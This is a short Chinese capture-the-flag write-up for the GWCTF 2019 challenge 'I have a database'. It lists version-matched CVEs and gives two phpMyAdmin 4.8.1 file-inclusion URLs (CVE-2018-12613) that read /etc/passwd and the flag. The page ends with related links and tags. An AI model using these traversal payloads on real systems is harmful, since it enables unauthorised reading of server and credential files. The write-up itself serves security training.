[GWCTF 2019]我有一个数据库

打开直接乱码，源码中也是乱码，而且还翻译不出来，但是可以在网络中刷新查看到原型

直接上扫描

打开robots.txt文件

phpinfo页面没有发现啥有用的信息

再打开phpmyadmin页面

这里显示了数据库的版本号、apache的版本号、php的版本号、phpmyadmin的版本号

直接在里面搜索数据啥也没有

只能对给出的版本信息突破，找相关的cve进行注入

• mysql 5.5.62 Mysql本地提权及远程代码执行漏洞浅析（CVE-2016-6662）
• Apache HTTPD 换行解析漏洞（CVE-2017-15715）
• PHP远程代码执行漏洞复现（CVE-2019-11043）
• phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613

每个都大致复现了一遍，最后只有phpmyadmin这个CVE有点希望

phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现_Senimo_的博客-CSDN博客

按照CVE的步骤

构造payload

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

本栏目推荐文章
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• Jmeter 如何连接mysql数据库？
• SQL Server 检测是不是数字型数据的两种方法
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• 深入理解spring框架：剖析多线程模式下数据库连接
• 数据可视化是如何帮助大型企业提高效率的？
• redis 数据库
• openpyxl模块--------------------------------重复数据

数据库 数据 GWCTF 2019数据库 数据gwctf 2019 reverse gwctf 2019 pyre 数据库 数据buuctf gwctf babyvm gwctf 2019 babyrsa crypto gwctf 2019 gwctf 2019 web 数据结构 结构 数据2019 缺陷 数据 软件2019 gwctf 2019